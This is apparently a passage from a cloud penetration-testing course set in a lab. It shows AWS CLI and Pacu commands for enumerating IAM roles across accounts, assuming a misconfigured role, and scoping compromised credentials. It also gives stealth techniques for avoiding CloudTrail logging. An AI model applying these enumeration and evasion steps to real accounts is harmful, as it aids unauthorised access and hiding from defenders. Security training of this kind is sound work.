To display information about a module, we prepend the help command to the module's name. Let's learn more about the iam__enum_roles module.
Pacu (offseclab:imported-attacker) > help iam__enum_roles
iam__enum_roles written by Spencer Gietzen of Rhino Security Labs.
usage: pacu [--word-list WORD_LIST] [--role-name ROLE_NAME] --account-id
ACCOUNT_ID
This module takes in a valid AWS account ID and tries to enumerate existing
IAM roles within that account. It does so by trying to update the
AssumeRole policy document of the role that you pass into --role-name if
passed or newlycreated role. For your safety, it updates the policy with an
explicit deny against the AWS account/IAM role, so that no security holes
are opened in your account during enumeration. NOTE: It is recommended to
use personal AWS access keys for this script, as it will spam CloudTrail
with "iam:UpdateAssumeRolePolicy" logs and a few "sts:AssumeRole" logs. The
target account will not see anything in their logs though, unless you find
a misconfigured role that allows you to assume it. The keys used must have
the iam:UpdateAssumeRolePolicy permission on the role that you pass into
--role-name to be able to identify a valid IAM role and the sts:AssumeRole
permission to try and request credentials for any enumerated roles.
...
Listing 45 - Displaying Information About iam__enum_roles Module in pacu
The output returned more information about the module, including usage instructions and details of the arguments that we can send.
The --account-id is a required flag that specifies the target's AccountID where we'll enumerate the roles.
The --word-list flag lets us specify the wordlist of role names to try. We'll use the list that we already created in /tmp/role-names.txt.
This module requires an existing role in the attacker's account. If we don't specify a role, the tool will create a temporary role (assuming that the credentials in the attacker account have the permissions to run that action). We'll let the tool create a role for us, therefore we won't use the --role-name flag.
We can use a module with the run command, followed by the name of the module and any other argument that we need to pass.
Pacu (offseclab:imported-attacker) > run iam__enum_roles --word-list /tmp/role-names.txt --account-id 123456789012
Running module iam__enum_roles...
...
[iam__enum_roles] Targeting account ID: 123456789012
[iam__enum_roles] Starting role enumeration...
[iam__enum_roles] Found role: arn:aws:iam::123456789012:role/lab_admin
[iam__enum_roles] Found 1 role(s):
[iam__enum_roles] arn:aws:iam::123456789012:role/lab_admin
[iam__enum_roles] Checking to see if any of these roles can be assumed for temporary credentials...
[iam__enum_roles] Role can be assumed, but hit max session time limit, reverting to minimum of 1 hour...
[iam__enum_roles] Successfully assumed role for 1 hour: arn:aws:iam::123456789012:role/lab_admin
[iam__enum_roles] {
"Credentials": {
"AccessKeyId": "ASIAQOMAIGYUWZXRMMO2",
"SecretAccessKey": "2UU80dtizqx3DUa9mn6033AjXKb13GXOMCy+tOUt",
"SessionToken": "FwoGZXIvYXdzEO///////////wEaDCv5...",
"Expiration": "2023-08-18 22:07:49+00:00"
},
"AssumedRoleUser": {
"AssumedRoleId": "AROAQOMAIGYUR5KMGWT7V:dCkQ0O1y6n9KSQmGBaKJ",
"Arn": "arn:aws:sts::123456789012:assumed-role/lab_admin/dCkQ0O1y6n9KSQmGBaKJ"
}
}
Cleaning up the PacuIamEnumRoles-XbsIV role.
Listing 46 - Running the iam__enum_roles Module in pacu
Excellent! The tool not only helped enumerate and discover a role, it also checked whether we had permission to use that role via sts:AssumeRole.
We are now in the state of an "Initial Compromise" and the next step will be scoping what we can achieve with our new level of access.
These examples show how an attacker can leverage the API to obtain information beyond their intended purpose. Furthermore, since these interactions with the API occur within the attacker's account, all related events are logged there, leaving no trace in the target's account.
Labs
- Enumerate other roles by creating a new list with the keywords "saphire", "ruby", and "amethyst", each followed by a dash and one of the custom role names we created before. For example:
ruby-lab_admin
ruby-security_auditor
ruby-content_creator
...
amethyst-backup_restore
amethyst-content_editor
Write the name of the role we can assume.
- Assume the role you found in the previous exercise and list (describe) all available VPCs using the role privileges. You will find the proof in a tag of one of the VPCs.
24.4. Initial IAM Reconnaissance
This Learning Unit covers the following Learning Objectives:
- Examining Compromised Credentials
- Scoping IAM permissions
After a successful enumeration and gaining an initial compromise, an attacker will often leverage footprinting techniques within the compromised environment. They will identify which accounts or access keys have been affected, and attempt to determine their level of access within the compromised environment. This process will often highlight potential attack vectors that may lead to the fulfillment of the attack's ultimate objectives.
Public cloud platforms typically log events of user activity by default. However, the level of monitoring, detection, and alerting varies based on an organization's configuration. Access attempts to restricted resources or unauthorized actions are more likely to trigger alerts. Skilled attackers keep their activity within the range of the compromised credentials' authorized actions to lower the chances of detection in these early stages.
At this stage, we won't begin enumerating resources. Instead, we'll focus on gathering initial information from the compromised credentials, including understanding the scope of access within the AWS environment. We'll explore various techniques for this, some stealthy and others less so.
24.4.1. Accessing the Lab
For the hands-on experience in this Learning Unit, we'll assume the role of an attacker who has achieved an initial compromise against the target and gained access to credentials allowing them to run actions within the AWS cloud environment.
We'll interact with the AWS infrastructure with AWS CLI, a unified tool used to manage AWS services directly from the command line. Although AWS CLI can run on several operating systems, we'll run it on Kali Linux. Since AWS CLI is included in Kali's official repositories, we'll install it with the package manager by running sudo apt install awscli.
After deploying the lab we'll receive credentials to interact with AWS as three different users.
The target user will simulate the compromised access to the cloud environment. This is the user we'll use most often while learning techniques to get information from this initial access.
The challenge user is an auxiliary user with very limited access that we'll use to test concepts and execute additional tasks, validating our newly learned skills.
The monitor user will simulate an operator with access to Cloudtrail, the AWS logging service.
For the moment let's start the lab deployment and take note of this information. We can organize the data as follows:
- Credentials access as the target user.
- Target ACCESS KEY ID
- Target SECRET ACCESS KEY
- Credentials access as the challenge user.
- Challenge ACCESS KEY ID
- Challenge SECRET ACCESS KEY
- Credentials to access as the monitor user.
- Management Console login URL
- Username
- Password
We'll configure and use these credentials in the upcoming section.
24.4.2. Examining Compromised Credentials
We begin our scenario with the assumption that we have obtained compromised credentials to interact with the target's cloud environment.
First, let's run aws configure to configure AWS CLI with these compromised credentials. We'll also include --profile target to create a profile named target. While this step is optional, it will help us easily identify when we are executing commands as the target user. If we acquire new credentials, we can seamlessly switch between users by specifying the profile instead of reconfiguring AWS CLI each time.
We won't need the exact region in this initial stage, so we'll simply choose us-east-1 as the default region.
The default output format is json. We can specify it or leave it blank, either of which will work for our purposes.
kali@kali:~$ aws configure --profile target
AWS Access Key ID []: AKIAVXWRNA7HUYFERLHS...
AWS Secret Access Key []: u1CmqAO9QR...
Default region name []: us-east-1
Default output format []: json
Listing 47 - Configuring AWS CLI with profiles
This configuration command won't return any output. Moving on, the next priority as an attacker would be to determine if the account is valid.
One way to do this is with the aws sts get-caller-identity command, which will provide us with three pieces of information about the IAM identity whose credentials are used to call the operation: the account ID, the identity type (IAM user or role), and the name of the identity.
Let's try running this command with our compromised credentials.
Warning
Unless otherwise specified, we'll use the target profile we configured in AWS CLI throughout this section. This means we need to include --profile target in every command we run.
kali@kali:~$ aws --profile target sts get-caller-identity
{
"UserId": "AIDAQOMAIGYUYNMOIF46I",
"Account": "123456789012",
"Arn": "arn:aws:iam::123456789012:user/support/clouddesk-plove"
}
Listing 48 - Getting details from the compromised credentials by running get-caller-identity.
This output reveals quite a bit of information about our current IAM user (or role). First, the UserId "AIDAQOMAIGYUYNMOIF46I" is the unique identifier of this IAM user. We also learned the AWS account ID of the account that controls this IAM user. We can use this account ID to help identify our target or to confirm that the credentials correspond to the target we're focusing on. Finally, we determined the Amazon Resource Name (ARN) associated with the calling entity. The ARN uniquely identifies AWS resources; in this case, the IAM user name is clouddesk-plove and it is associated with the path /support/.
Tip
Paths are optional identifiers used for grouping related identities to align with the company's organization structure.
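The ARN can be split mechanically into these components. A small sketch (the helper name is an assumption for illustration):

```python
def parse_user_arn(arn: str):
    # Format: arn:aws:iam::<account-id>:user/<path...>/<username>
    parts = arn.split(":")
    account_id, resource = parts[4], parts[5]
    segments = resource.split("/")
    username = segments[-1]
    # The path is everything between "user" and the username, or "/" if absent.
    path = "/" + "/".join(segments[1:-1]) + "/" if len(segments) > 2 else "/"
    return account_id, path, username

print(parse_user_arn("arn:aws:iam::123456789012:user/support/clouddesk-plove"))
# ('123456789012', '/support/', 'clouddesk-plove')
```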
The get-caller-identity subcommand is a good way to identify the account and identity of the credentials, and this action will never return an AccessDenied error. However, we should be aware that this action is logged in Cloudtrail's event history. As defenders, we should establish alerts for these types of calls as they are typically executed by attackers once they've compromised credentials.
Tip
No permissions are required to perform this operation. If an administrator attaches a policy to an identity that explicitly denies access to the sts:GetCallerIdentity action, we can still perform this operation. Permissions are not required because the same information is returned when access is denied.
Alternatively, we could use the stealthier aws sts get-access-key-info command to gather this information. It returns the account identifier for the access key ID we specify with the --access-key-id flag. Executing this command from an external account ensures that the event is logged in the attacker's account instead of the target's.
We'll run this command using the challenge user to simulate an attack from an external account. We'll specify the Access Key ID of the target's credentials. Be aware that this value will change every time we start the lab.
We'll configure AWS CLI to use the challenge user credentials by creating a profile and then include the --profile challenge to interact with AWS as the challenge user.
kali@kali:~$ aws configure --profile challenge
AWS Access Key ID []: AKIAVXW...
AWS Secret Access Key []: KlnPvlFhvrrxg...
Default region name []: us-east-1
Default output format []: json
kali@kali:~$ aws --profile challenge sts get-access-key-info --access-key-id AKIAQOMAIGYUVEHJ7WXM
{
"Account": "123456789012"
}
Listing 49 - Getting the account ID from access keys with the get-access-key-info command.
Penetration testers can also use the get-access-key-info subcommand to determine whether or not a compromised credential is inside the scope of the assessment.
Another stealthy approach is to abuse error messages that aren't logged by default in the Cloudtrail event history. For example, let's try invoking a nonexistent Lambda function using the compromised credentials.
In general, we can execute a function with aws lambda invoke --function-name <function_name_or_arn> <outfile>, in which --function-name specifies the name of the function and outfile is the name of the output file. Let's craft an ARN for a nonexistent lambda function.
kali@kali:~$ aws --profile target lambda invoke --function-name arn:aws:lambda:us-east-1:123456789012:function:nonexistent-function outfile
An error occurred (AccessDeniedException) when calling the Invoke operation: User: arn:aws:iam::123456789012:user/support/clouddesk-plove is not authorized to perform: lambda:InvokeFunction on resource: arn:aws:lambda:us-east-1:123456789012:function:nonexistent-function because no resource-based policy allows the lambda:InvokeFunction action
Listing 50 - Getting information from error messages
We encountered an authentication error, which was anticipated since we are attempting to interact with a nonexistent resource. However, the error message offers us valuable information, including the account ID, the type of identity (IAM user or role), and the name of the identity executing this operation.
We obtained the same information from running sts get-caller-identity, and even though the command generated an error, it should not have generated a log event which could potentially alert an administrator.
There isn't a "list" of actions that aren't logged in the Cloudtrail event history. However, Cloudtrail's Documentation states that data events and insights events are not displayed. Since invoking a Lambda function is considered a data event, it is not displayed in the event history. It's important to note that while these events might not be logged by default in the event history, they can indeed be captured (if configured) using trails.
One final consideration is that attackers may attempt to discern which AWS regions the account operates in and execute these commands in a different region. This increases the likelihood of evading detection.
Warning
AWS lets us locate our resources in one or more regions spread throughout the world. By default, many regions are enabled in the account even if we're only using one or two.
Let's take on the role of an administrator for a moment to validate that this technique works. We'll log in to the Management Console using the monitoring user credentials we received when we started the lab. Then we'll navigate to the CloudTrail service page. We can find this page in the Services Menu or through the Search Box.
Tip
When we first open the CloudTrail Service page, an AccessDenied error will appear at the top of the page stating "The option to create an organization trail is not available for this AWS account". We can safely ignore this error as it doesn't affect what we'll do with this user.
On the Cloudtrail page, we'll click on the Event History option from the menu located on the left side of the page. If the Cloudtrail menu doesn't appear, we can open it by clicking the hamburger icon located on the top left-hand side.
Next, as the attacker, we'll use the compromised credentials to check if these events are recorded in the Cloudtrail page.
Let's execute sts get-caller-identity once more, but this time we'll specify a different region with --region us-east-2.
kali@kali:~$ aws --profile target sts get-caller-identity --region us-east-2
{
"UserId": "AIDAQOMAIGYUYVDBXFNVF",
"Account": "123456789012",
"Arn": "arn:aws:iam::123456789012:user/support/clouddesk-plove"
}
Listing 51 - Executing an API request to another region.
Within a few minutes, a log entry from the us-east-2 region appears in the Cloudtrail event history. However, there is no entry from us-east-1. We may need to adjust the filter parameters to query the logs for Event Name and the GetCallerIdentity value. We can also use the quick access links below which already contain the region and the filter we desire.
Quick access link to Cloudtrail Page in Region us-east-1 filtering by Event Name.
Quick access link to Cloudtrail Page in Region us-east-2 filtering by Event Name.
The following animated figure shows the process of comparing the logs in Cloudtrail while swapping between two different regions. The log entry of the GetCallerIdentity event is not visible in the default region us-east-1, but appears when we switch to the us-east-2 region.
One way to avoid this is to specify which AWS regions your account can use and monitor all activity in these regions.
In this initial stage, regardless of the cloud service provider we are assessing, it's essential to identify and use services and actions that provide valuable information about the compromised user's cloud environment. If maintaining stealth is important, we should first focus on activities that aren't recorded by default to discreetly gather information about the compromised target.
Labs
- In AWS CLI, what sts subcommand returns details about the IAM user or role whose credentials are used to call the operation? (Write only the name of the subcommand)
- In AWS CLI, what sts subcommand returns the account identifier for the specified access key ID? (Write only the name of the subcommand)
- In AWS CLI, what is the name of the option flag that specifies the region to use, overriding the default region? (Write your answer in this format: --name)
24.4.3. Scoping IAM permissions
All cloud providers implement some kind of authentication and authorization mechanisms to ensure that users can only interact with the provider's API within their designated permissions and cannot act on behalf of other users or accounts. All these mechanisms are commonly grouped under the umbrella term Identity and Access Management (IAM).
The Principle of Least Privilege (PoLP) is generally followed as a best practice for any cloud deployment. This principle suggests granting users only the permissions they need to perform their tasks, and nothing more. This will reduce actions that can be performed and limit potential attack vectors that an attacker can exploit from a compromised account. However, overly-permissive identities are still a common finding and the major cause of breaches in cloud environments.
Continuing in the lab, we'll again take on the role of an attacker to determine the extent of permissions associated with the compromised credentials in the target environment.
We've already uncovered some valuable information from the previous get-caller-identity subcommand which revealed that the compromised identity is an IAM User with a username of clouddesk-plove. We also identified the support path:
kali@kali:~$ aws --profile target sts get-caller-identity
{
"UserId": "AIDAQOMAIGYUYNMOIF46I",
"Account": "123456789012",
"Arn": "arn:aws:iam::123456789012:user/support/clouddesk-plove"
}
Listing 52 - Running the get-caller-identity command
This suggests the purpose of the user and what permissions they likely have. For example, "clouddesk" and "support" may tell us that the user has some IAM-related privileges to grant access or reset credentials. This type of hypothesis is helpful as it's extra information we've gained while maintaining a low profile.
We could also take a more direct approach. Let's try to list the policies associated with the compromised identity by interacting directly with the provider API. An identity is an IAM resource that can be authorized to perform actions and access resources. Identities include users, groups, and roles. Within AWS IAM, there are two primary ways policies can be associated to an Identity. Inline Policies are directly linked to a single identity and exist only in that identity space. Managed Policies stand as distinct, reusable policies that can be associated with multiple identities.
An identity can also inherit policies from other identities. For example, an IAM user that is a member of a User Group will inherit that group's policies.
We can list inline policies and managed policies associated with the user by running list-user-policies and list-attached-user-policies respectively. Both commands will require the --user-name flag to specify the target user.
kali@kali:~$ aws --profile target iam list-user-policies --user-name clouddesk-plove
{
"PolicyNames": []
}
kali@kali:~$ aws --profile target iam list-attached-user-policies --user-name clouddesk-plove
{
"AttachedPolicies": [
{
"PolicyName": "deny_challenges_access",
"PolicyArn": "arn:aws:iam::123456789012:policy/deny_challenges_access"
}
]
}
Listing 53 - Listing inline and managed policies associated with an IAM user
Since neither command returned an error message, we know that the IAM user has permission to run the iam:ListUserPolicies and iam:ListAttachedUserPolicies actions. However, we still have not discovered any useful policies associated with the IAM user. The deny_challenges_access policy is related to a later challenge, so we'll ignore it for now.
Let's try to run more IAM commands and prioritize retrieving the policy for this user.
First, we'll try to determine if the IAM user inherits any policies from assigned groups. To do this, we'll need to determine if the user is a member of any groups with the list-groups-for-user subcommand specifying the name of the user with --user-name clouddesk-plove.
kali@kali:~$ aws --profile target iam list-groups-for-user --user-name clouddesk-plove
{
"Groups": [
{
"Path": "/support/",
"GroupName": "support",
"GroupId": "AGPAQOMAIGYUSHSVDSYIP",
"Arn": "arn:aws:iam::123456789012:group/support/support"
}
]
}
Listing 54 - Listing the groups to which the user belongs.
We discovered that the IAM user belongs to only one group, named support.
Next, we'll check for policies associated with the support group. We'll search for inline and managed policies, similar to the search we ran previously. Let's use list-group-policies to list inline policies linked to the group and list-attached-group-policies to list managed policies attached to it. We'll specify the group name for both commands with --group-name.
kali@kali:~$ aws --profile target iam list-group-policies --group-name support
{
"PolicyNames": []
}
kali@kali:~$ aws --profile target iam list-attached-group-policies --group-name support
{
"AttachedPolicies": [
{
"PolicyName": "SupportUser",
"PolicyArn": "arn:aws:iam::aws:policy/job-function/SupportUser"
}
]
}
Listing 55 - Listing inline and managed policies associated with an IAM group
From the output, we learn that the group doesn't have any inline policy, but it does have an attached managed policy. This particular policy is classified as an AWS Managed Policy, a special set of policies provided by AWS with pre-defined permissions to quickly attach to IAM Identities. However, a word of caution: these policies often grant broader permissions than might be desired. Ideally, they should be paired with other more-restrictive policies to ensure fine-grained permission control.
Warning
While AWS Managed Policies offer flexibility for IAM management, they tend to be overly-permissive and there is an inherent security risk when they are used alone.
We discovered this user possesses SupportUser, which is a special type of AWS managed policy that is based on Job Functions. We can identify this from the keyword job-function in the policy's ARN highlighted in the Listing above.
We'll note the ARN string, as we'll need it in a moment.
The documentation suggests that the SupportUser policy permits many read-only actions for several AWS services. Let's validate this in the lab.
First, we'll need to determine the current version of the policy since policies support versioning. We'll use aws iam list-policy-versions for this and specify the policy by its ARN with --policy-arn.
kali@kali:~$ aws --profile target iam list-policy-versions --policy-arn "arn:aws:iam::aws:policy/job-function/SupportUser"
{
"Versions": [
{
"VersionId": "v8",
"IsDefaultVersion": true
},
{
"VersionId": "v7",
"IsDefaultVersion": false
},
...
Listing 56 - Listing a policy version
We'll take note of the most recent version ID, v8.
We can now retrieve the policy document with aws iam get-policy-version. Again, we'll specify the ARN of the policy and we'll also specify the version Id (v8) with --version-id.
kali@kali:~$ aws --profile target iam get-policy-version --policy-arn arn:aws:iam::aws:policy/job-function/SupportUser --version-id v8
{
"PolicyVersion": {
"Document": {
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"support:*",
"acm:DescribeCertificate",
"acm:GetCertificate",
"acm:List*",
"acm-pca:DescribeCertificateAuthority",
"autoscaling:Describe*",
...
"workdocs:Describe*",
"workmail:Describe*",
"workmail:Get*",
"workspaces:Describe*"
],
"Effect": "Allow",
"Resource": "*"
}
]
},
"VersionId": "v8",
"IsDefaultVersion": true,
...
}
}
Listing 57 - Listing a policy definition by its version
In summary, the policy defines a list of Actions for many AWS services. Some of these elements define a specific action. For example, acm:DescribeCertificate defines the DescribeCertificate action for the AWS Certificate Manager service. Other elements use the "*" wildcard to describe any action that starts with read-only keywords such as Get, Describe, and List. These actions are allowed to run against any resource of the given services, as stated in the "Resource": "*" line.
At this point, while we don't have the ability to create or modify cloud resources, we do have permission to read information about several of them.
Finally, let's suppose that our compromised credentials don't have the privileges to query for IAM-related information. In this case, we need to adopt a brute-force approach, meaning we'll run several actions on services in hopes of finding one that doesn't produce an authorization error.
We can build a script to automate this brute-force approach or leverage popular AWS tools such as Pacu (module: iam__bruteforce_permissions), awsenum, or enumerate-iam. Any of these approaches can help us discover the permissions granted to compromised credentials.
Like many brute-force attacks, these tools will generate a lot of AccessDenied events in the account's logs, which could trigger alarms within the target. This may not be a problem in penetration testing assessments that don't require stealth. In red-teaming assessments that prioritize stealth, we could adopt a manual approach, which generates fewer errors and sets off fewer alarms. We should always leverage information from our reconnaissance to help with this. For example, if we determined a list of services the account is using, we can target those services first, reducing the amount of noise we generate.
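The control flow of such a brute-force tool is straightforward. The sketch below outlines it in Python with an injectable run_action callable; in practice that callable would wrap a boto3 or AWS CLI invocation, so the stub here exists only to keep the example self-contained:

```python
def bruteforce_permissions(candidate_actions, run_action):
    """Try each candidate action and collect the ones that aren't denied.

    run_action(action) should return the API response on success and raise
    PermissionError (standing in for an AccessDenied error) otherwise.
    """
    allowed = []
    for action in candidate_actions:
        try:
            run_action(action)
            allowed.append(action)
        except PermissionError:
            pass  # every denied call still leaves an event in the account's logs
    return allowed

# Hypothetical stub: only ec2:DescribeInstances "succeeds"
def fake_runner(action):
    if action != "ec2:DescribeInstances":
        raise PermissionError("AccessDenied")
    return {}

candidates = ["s3:ListAllMyBuckets", "ec2:DescribeInstances", "iam:ListUsers"]
print(bruteforce_permissions(candidates, fake_runner))  # ['ec2:DescribeInstances']
```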
In this stage, we used the CSP APIs to attempt to scope the level of access that we obtained from the compromised credentials. With access to IAM-related actions, we learned that we can query directly for this information. Otherwise, depending on the assessment, we can try to enumerate the privileges by running an automated or manual approach to scope the level of access.
Labs
- What command is used to list the inline policies associated with an IAM user in AWS?
A) list-attached-user-policies
B) list-user-policies
C) list-group-policies
D) list-policies
- What does the wildcard "*" represent in an IAM policy's action statement?
A) It limits the action to a specific resource
B) It grants read-only permissions
C) It allows all actions that match the specified prefix
D) It denies all actions for the specified service
- Use the challenge Profile in AWS CLI to scope the level of actions allowed to run in the EC2 service. Run the permitted actions to list or describe Resources. You will find a Tag Key named proof in one of the resources you can list. Enter the value of the Tag Key.
24.5. IAM Resources Enumeration
This Learning Unit covers the following Learning Objectives:
- Choosing Between a Manual or Automated Enumeration Approach
- Enumerating IAM Resources
- Processing API Response data with JMESPath
- Running Automated Enumeration with Pacu
- Extracting Insights from Enumeration Data
In the previous Learning Unit, we set the stage of this scenario from the perspective of an attacker that compromised a target and obtained credentials to interact with the provider's API. We then conducted footprinting of the compromised environment, tried to identify which accounts or access keys we had access to, and determined our level of access within the compromised environment. By combining our findings with information gathered from external probing, we established a foundational understanding of some services that the account had access to.
Next, we'll gather more data from the target. There's no one-size-fits-all approach to this task. The data we're hoping to obtain will vary based on many factors and the techniques we'll use depend on the target's cloud environment and providers.
In the following sections, we will enumerate more IAM resources within an AWS environment, but many of the tactics and procedures apply to other cloud service providers as well.
24.5.1. Choosing Between a Manual or Automated Enumeration Approach
Several commercial and open-source tools have been developed to perform information gathering against cloud-based infrastructures. Some of these tools are tailored towards specific cloud providers, while others support multiple providers. Some are GUI-based and some run from the command line. Some are automated and some require manual intervention.
Most tools generate significant log events and may trigger monitoring systems. This may not be a significant consideration when performing a penetration test in which stealth is not a requirement, but when stealth is a factor, such as in a red team assessment, we must test our tools to determine their potential impact prior to an engagement.
Given the variety of available tools, varied assessment goals, user preferences, budget requirements, and other factors, there is rarely a single "best tool" for the job. Generally speaking, we should train with multiple tools so that we understand their capabilities and limitations and can rely on them in any given situation, in the best possible combination as needed. It is important, however, to always understand the technologies underlying any tool we rely on, so that we don't develop the bad habit of simply running multiple tools at every situation, which can be both dangerous and inefficient.
24.5.2. Enumerating IAM Resources
As we begin to enumerate IAM resources, we'll start our scenario in possession of an already-compromised account. Let's summarize what we have already learned from the compromised credentials.
Resource Type | Name | ARN |
---|---|---|
IAM::User | clouddesk-plove | arn:aws:iam::123456789012:user/support/clouddesk-plove |
IAM::Group | support | arn:aws:iam::123456789012:group/support/support |
IAM::Policy | SupportUser | arn:aws:iam::aws:policy/job-function/SupportUser |
The compromised credentials we possess belong to the clouddesk-plove IAM user, which is a member of the support group and inherits the policy attached to that group. The policy is an AWS managed policy based on the Support User job function.
Warning
Customer managed policies allow users to define a set of permissions that can be reused and associated with multiple IAM users, groups, or roles. While these policies offer flexibility for IAM management, there is an inherent security risk if they are crafted to be overly permissive.
SupportUser is an AWS managed policy that grants permissions to troubleshoot and resolve issues in an AWS account. This policy grants read-only access to explore several services.
Let's check what actions this policy grants to enumerate IAM resources. To do this we'll run iam get-policy-version to show the policy definition. We'll pipe the output to grep to filter and display only the lines that contain the string iam.
kali@kali:~$ aws --profile target iam get-policy-version --policy-arn arn:aws:iam::aws:policy/job-function/SupportUser --version-id v8 | grep "iam"
"iam:GenerateCredentialReport",
"iam:GenerateServiceLastAccessedDetails",
"iam:Get*",
"iam:List*",
Listing 58 - Getting the permissions related to IAM service of the SupportUser policy
With this policy, we can run any iam subcommand that starts with get or list, plus two other specific actions. To list the available subcommands in the AWS CLI, we can use the help option.
Let's run aws iam help to display a description of the command usage including a list of all available subcommands. We'll also add | grep -E "list-|get-|generate-" to filter all the lines that include the words "list-", "get-" and "generate-".
kali@kali:~$ aws --profile target iam help | grep -E "list-|get-|generate-"
o generate-credential-report
o generate-organizations-access-report
o generate-service-last-accessed-details
o get-access-key-last-used
o get-account-authorization-details
o get-account-password-policy
o get-account-summary
o get-context-keys-for-custom-policy
o get-context-keys-for-principal-policy
o get-credential-report
o get-group
o get-group-policy
o get-instance-profile
o get-login-profile
o get-open-id-connect-provider
o get-organizations-access-report
o get-policy
o get-policy-version
o get-role
o get-role-policy
o get-saml-provider
o get-server-certificate
o get-service-last-accessed-details
o get-service-last-accessed-details-with-entities
o get-service-linked-role-deletion-status
o get-ssh-public-key
o get-user
o get-user-policy
o list-access-keys
o list-account-aliases
o list-attached-group-policies
o list-attached-role-policies
o list-attached-user-policies
o list-entities-for-policy
o list-group-policies
o list-groups
o list-groups-for-user
o list-instance-profile-tags
o list-instance-profiles
o list-instance-profiles-for-role
o list-mfa-device-tags
o list-mfa-devices
o list-open-id-connect-provider-tags
o list-open-id-connect-providers
o list-policies
o list-policies-granting-service-access
o list-policy-tags
o list-policy-versions
o list-role-policies
o list-role-tags
o list-roles
o list-saml-provider-tags
o list-saml-providers
o list-server-certificate-tags
o list-server-certificates
o list-service-specific-credentials
o list-signing-certificates
o list-ssh-public-keys
o list-user-policies
o list-user-tags
o list-users
o list-virtual-mfa-devices
Listing 59 - Getting available IAM subcommands
IAM is a critical component of AWS that manages all actions related to the authentication and authorization of identities. Having this level of access, even though it's read-only access, is a big deal.
We won't cover the entire list of subcommands in this lab. We could, however, learn about any of them by running aws iam <subcommand> help. This shows details about the subcommand and its basic usage, including the required and optional parameters.
Let's start by getting a summary of the IAM-related information in the account. We'll run aws iam get-account-summary with no additional arguments.
To limit our noise level, we'll save the output to a file. This way, we can review it later without interacting with the AWS API again. We'll use tee to display the output in the console while also writing it to a file.
kali@kali:~$ aws --profile target iam get-account-summary | tee account-summary.json
{
"SummaryMap": {
"GroupPolicySizeQuota": 5120,
"InstanceProfilesQuota": 1000,
"Policies": 8,
"GroupsPerUserQuota": 10,
"InstanceProfiles": 0,
"AttachedPoliciesPerUserQuota": 10,
"Users": 18,
"PoliciesQuota": 1500,
"Providers": 1,
"AccountMFAEnabled": 0,
"AccessKeysPerUserQuota": 2,
"AssumeRolePolicySizeQuota": 2048,
"PolicyVersionsInUseQuota": 10000,
"GlobalEndpointTokenVersion": 1,
"VersionsPerPolicyQuota": 5,
"AttachedPoliciesPerGroupQuota": 10,
"PolicySizeQuota": 6144,
"Groups": 8,
"AccountSigningCertificatesPresent": 0,
"UsersQuota": 5000,
"ServerCertificatesQuota": 20,
"MFADevices": 0,
"UserPolicySizeQuota": 2048,
"PolicyVersionsInUse": 27,
"ServerCertificates": 0,
"Roles": 20,
"RolesQuota": 1000,
"SigningCertificatesPerUserQuota": 2,
"MFADevicesInUse": 0,
"RolePolicySizeQuota": 10240,
"AttachedPoliciesPerRoleQuota": 10,
"AccountAccessKeysPresent": 0,
"GroupsQuota": 300
}
}
Listing 60 - Getting the IAM Account Summary
The output shows some information that is more relevant for administrators such as resource quotas, but it also shows some insights about the number of IAM resources created in the account such as Users, Roles, Groups, and Policies.
This data also highlights some poor practices in the configuration that could lead to further exploitation. Notably, "MFADevices": 0 and "MFADevicesInUse": 0, indicate that none of the eighteen IAM users use Multi-Factor Authentication (MFA). This lack of a secondary authentication layer makes the account more vulnerable if its credentials are compromised. In addition, "AccountMFAEnabled": 0 reveals that MFA is not enabled for the account's most critical user: root.
A few additional elements are worth mentioning, although they fall outside the scope of this Module. InstanceProfiles are essential for authorizing EC2 instances; they manage permissions and roles for instances in a secure manner. Providers refers to Identity Providers, which are crucial for managing identities outside of AWS; they enable external identities to access AWS resources in the account. Lastly, ServerCertificates are necessary for services that require SSL/TLS encryption.
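Since we saved the summary to account-summary.json, weak spots like the missing MFA coverage can be flagged automatically. A small sketch, assuming only the SummaryMap structure from Listing 60 (the helper name is ours):

```python
def mfa_findings(summary):
    """Return human-readable findings about MFA coverage in the account."""
    s = summary["SummaryMap"]
    findings = []
    if s.get("AccountMFAEnabled", 1) == 0:
        findings.append("Root account does not have MFA enabled")
    if s.get("Users", 0) > 0 and s.get("MFADevicesInUse", 0) == 0:
        findings.append(f"None of the {s['Users']} IAM users use MFA")
    return findings

# Inline sample; in practice, load it with json.load(open("account-summary.json"))
summary = {"SummaryMap": {"AccountMFAEnabled": 0, "Users": 18, "MFADevicesInUse": 0}}
for finding in mfa_findings(summary):
    print(finding)
```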
Let's continue enumerating all the IAM identities (users, user groups, and roles) in the account. We'll use the list-users, list-groups, and list-roles subcommands respectively.
kali@kali:~$ aws --profile target iam list-users | tee users.json
{
"Users": [
{
"Path": "/admin/",
"UserName": "admin-alice",
"UserId": "AIDAQOMAIGYU3FWX3JOFP",
"Arn": "arn:aws:iam::123456789012:user/admin/admin-alice",
},
...
kali@kali:~$ aws --profile target iam list-groups | tee groups.json
{
"Groups": [
{
"Path": "/admin/",
"GroupName": "admin",
"GroupId": "AGPAQOMAIGYUXBR7QGLLN",
"Arn": "arn:aws:iam::123456789012:group/admin/admin",
},
...
kali@kali:~$ aws --profile target iam list-roles | tee roles.json
{
"Roles": [
{
"Path": "/",
"RoleName": "aws-controltower-AdministratorExecutionRole",
"RoleId": "AROAQOMAIGYU6PUFJYD7W",
"Arn": "arn:aws:iam::123456789012:role/aws-controltower-AdministratorExecutionRole",
...
Listing 61 - Listing IAM identities
The three commands will output an array of all the users, groups, and roles in the account, providing detailed information about each identity, including its name, ARN, and path. These attributes can help us identify valuable identities for further analysis. For instance, we may find some identities with the "admin" keyword in both their names and paths. While these require further verification, they could be particularly significant for exploitation.
Up to this point, we have saved the data into their respective files so we can later parse these files to extract valuable insights from the account. Before we dig through this data, let's continue to gather more information.
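For example, a quick pass over the saved files can surface identities whose name or path hints at elevated privileges. A sketch assuming the JSON structure from Listing 61:

```python
def find_keyword(identities, name_key, keyword="admin"):
    """Return names of identities whose name or path contains the keyword."""
    return [i[name_key] for i in identities
            if keyword in i.get(name_key, "").lower()
            or keyword in i.get("Path", "").lower()]

# Inline sample shaped like users.json; in practice: json.load(open("users.json"))
users = {"Users": [
    {"Path": "/admin/", "UserName": "admin-alice"},
    {"Path": "/support/", "UserName": "clouddesk-plove"},
]}
print(find_keyword(users["Users"], "UserName"))  # ['admin-alice']
```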
We can list all managed policies with list-policies. We'll use --scope Local to display only the Customer Managed Policies and omit the AWS Managed Policies, and we'll use --only-attached to list only the policies that are attached to an IAM identity.
